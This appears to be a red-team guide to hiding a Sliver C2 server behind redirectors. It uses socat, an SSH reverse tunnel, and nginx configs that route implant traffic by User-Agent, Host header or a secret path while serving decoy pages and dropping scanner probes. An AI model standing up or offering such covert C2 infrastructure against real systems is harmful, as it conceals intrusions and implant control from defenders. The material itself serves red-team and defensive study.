Sliver

C2 Matrix

https://howto.thec2matrix.com/

Redirector and C2 communication setup

Using socat

  1. On the redirector: sudo socat tcp-listen:8443,reuseaddr,fork,bind=[redirector IP] tcp:127.0.0.1:4567 — this listens on the public 8443 and hands every connection to the loopback port that the SSH tunnel in step 2 opens. socat does no inspection at all: whatever Sliver listener is bound to 8443 on the C2 terminates TLS itself, so its handshake and certificate are directly observable by any scanner that connects. It is the least covert option on this page; prefer the nginx variants below when the listener must survive scrutiny.
  2. On the C2 server: ssh -N -R 4567:localhost:8443 root@[redirector IP] — the reverse tunnel binds 4567 on the redirector's loopback only (OpenSSH default GatewayPorts no), which is why socat is needed to expose it, and it is initiated from the C2, so the redirector never holds credentials for the C2 host. Use a dedicated unprivileged, key-only account on the redirector instead of root (the tunnel needs no privileges), and add -o ServerAliveInterval=30 -o ExitOnForwardFailure=yes (or run it under autossh) so a dropped tunnel is noticed rather than silently leaving socat forwarding to a closed port.

Using Nginx

  1. Nginx configuration (fragment — the enclosing http {} block and the closing braces are snipped). Note that this listener is plain HTTP on port 80 and routes purely on a User-Agent regex: the pattern must match whatever User-Agent the implant is built to send, a "." in the regex matches any character, and "~*" makes the match case-insensitive. Two proxy_pass directives inside if blocks are the documented "if is evil" pattern; a map on $http_user_agent selecting the upstream is the safer equivalent.

    ...[snip]...
    
            # Default
        server {
            listen 80 default_server;
    
            charset UTF-8;
    
            error_page 404 /backend-not-found.html;
            location = /backend-not-found.html {
            allow all;
            }
    
            location / {
    
            # Redirection rule
            if ( $http_user_agent ~* 'z.5.x.2.l.8.y.5' ) {
                proxy_pass http://C2_SERVER$request_uri;
            }
            if ( $http_user_agent !~* 'z.5.x.2.l.8.y.5' ) {
                proxy_pass http://FAKE_WEBSITE$request_uri;
            }
    
    ...[snip]...
    
  2. Nginx v.2

    NGINX Config – /etc/nginx/sites-available/c2-redirector

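    # Placed in /etc/nginx/sites-available/ this file is included inside the http {} context,
    # so the map below is valid here. It sets "Connection: upgrade" only when the client
    # actually sent an Upgrade header; the original hard-coded it on every request, which is
    # incorrect for ordinary HTTP and only matters if the implant uses WebSockets at all.
    map $http_upgrade $connection_upgrade {
        default upgrade;
        ''      close;
    }

    # Catch-all for connections that arrive without SNI or with another name (scanners and
    # crawlers hitting the redirector's IP). Without an explicit default_server nginx routes
    # them to the first server block on :443 -- i.e. straight to the C2. Remove this block if
    # another vhost on this host already declares default_server for 443. The certificate
    # still reveals the hostname to anyone who connects; on nginx >= 1.19.4 replace the two
    # ssl_* lines with `ssl_reject_handshake on;` so no certificate is presented at all.
    server {
        listen 443 ssl default_server;
        server_name _;
        ssl_certificate /etc/ssl/certs/fullchain.pem;
        ssl_certificate_key /etc/ssl/private/privkey.pem;
        return 444;
    }

    server {
        listen 443 ssl;
        server_name c2.domain.com;

        # Pin the protocol floor explicitly instead of relying on the build's defaults.
        ssl_protocols TLSv1.2 TLSv1.3;
        ssl_certificate /etc/ssl/certs/fullchain.pem;
        ssl_certificate_key /etc/ssl/private/privkey.pem;

        location / {
            # The hop to the C2 is plain HTTP. Keep <C2_SERVER_IP>:80 reachable only from
            # this host (firewall rule, or point it at an SSH/WireGuard tunnel endpoint),
            # otherwise implant traffic crosses the network unencrypted. Nothing here
            # filters by path or User-Agent, so any client that reaches this vhost with
            # the right SNI is proxied to the C2 -- see the split example further down.
            proxy_pass http://<C2_SERVER_IP>:80;
            proxy_http_version 1.1;
            proxy_set_header Host $host;
            proxy_set_header X-Real-IP $remote_addr;
            proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
            proxy_set_header Upgrade $http_upgrade;
            proxy_set_header Connection $connection_upgrade;
        }
    }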
    

    Enable and Reload

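    # -sf makes this idempotent: re-running replaces a stale link instead of failing
    # with "File exists". Validate the config before reloading so a typo never takes
    # the redirector (and every implant behind it) down.
    ln -sf /etc/nginx/sites-available/c2-redirector /etc/nginx/sites-enabled/
    nginx -t && systemctl reload nginx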
    
  3. Example 1: Host-header allow-list (often called a "domain fronting style" redirect, although it is not fronting — see the note after the config)

    NGINX Config: Fronting with Header Filtering

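    server {
        listen 443 ssl;
        server_name cdn.example.com;

        # Pin the protocol floor explicitly instead of relying on the build's defaults.
        ssl_protocols TLSv1.2 TLSv1.3;
        ssl_certificate /etc/ssl/certs/fullchain.pem;
        ssl_certificate_key /etc/ssl/private/privkey.pem;

        location / {
            # Allow-list the Host header the implants are built to send. $http_host is the
            # raw header value, so accept an explicit ":443" suffix (some clients append it)
            # and compare case-insensitively (Host is case-insensitive per RFC 9110); the
            # original exact `!= "cdn.example.com"` rejected both legitimate forms. $host is
            # deliberately not used: it falls back to server_name when the header is absent,
            # which would wave a Host-less HTTP/1.0 probe through.
            if ($http_host !~* "^cdn\.example\.com(:443)?$") {
                return 444; # close the connection without sending a response
            }

            # TLS terminates here, so server_name already selects this block by SNI; the
            # check above only catches SNI/Host disagreement and direct-IP probes, and it
            # does so after the handshake, so the certificate (and hostname) is still
            # disclosed. A default_server block on :443 with ssl_reject_handshake (nginx
            # >= 1.19.4) drops such probes before any certificate is sent.
            # Backend hop is plain HTTP: restrict <C2_SERVER_IP>:80 to this host.
            proxy_pass http://<C2_SERVER_IP>:80;
            proxy_http_version 1.1;
            proxy_set_header Host $http_host;
            proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
            proxy_set_header X-Real-IP $remote_addr;
        }
    }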
    

    Note: this is not domain fronting. Because TLS terminates on this server, the SNI (server_name) already selects the block; the Host check only drops requests whose Host header disagrees with the expected name — scanners hitting the IP directly, or clients sending some other Host. Genuine fronting needs a CDN edge that routes on the Host header independently of the SNI, and since AWS and Google no longer allow that SNI/Host mismatch this config cannot emulate it. Treat it as a cheap allow-list of the hostname your implants are built to send, nothing more.

  4. Example 2: Split Redirector (Static + C2 Routing) NGINX Config: Decoy + Secret Path

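    server {
        listen 443 ssl;
        server_name update.mydomain.net;

        # Pin the protocol floor explicitly instead of relying on the build's defaults.
        ssl_protocols TLSv1.2 TLSv1.3;
        ssl_certificate /etc/ssl/certs/fullchain.pem;
        ssl_certificate_key /etc/ssl/private/privkey.pem;

        # Decoy site for every path not claimed by the C2 location below. The original
        # `location = /` served only the exact "/" URI, so /favicon.ico, /robots.txt or any
        # crawled link fell through to nginx's compiled-in default root (unless one is set at
        # http level) and its stock 404 page, which looks nothing like a real site. try_files
        # gives unknown files a normal 404 from the decoy root instead.
        location / {
            root /var/www/html/;
            index index.html;
            try_files $uri $uri/ =404;
        }

        # Secret C2 path. ^~ makes this prefix win over any regex location added later (no
        # behaviour change for the config as written). It matches /blog-update and everything
        # beneath it. Confirm the implant's requests really carry this prefix; if the C2
        # profile generates its own path segments, those must be proxied too or they will be
        # answered by the decoy and never reach the C2.
        # Backend hop is plain HTTP: restrict <C2_SERVER_IP>:80 to this host. Also add a
        # default_server on :443 returning 444 so probes by bare IP never reach this vhost.
        location ^~ /blog-update {
            proxy_pass http://<C2_SERVER_IP>:80;
            proxy_http_version 1.1;
            proxy_set_header Host $host;
            proxy_set_header X-Real-IP $remote_addr;
            proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        }
    }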
    

    Build the implant with https://update.mydomain.net/blog-update as its C2 URL; casual visitors who browse the site see only the static decoy page. Verify with a packet capture or the nginx access log that the implant's requests actually start with /blog-update — anything that matches neither location is answered by nginx itself and never forwarded to the C2.

OpSec tips for nginx redirectors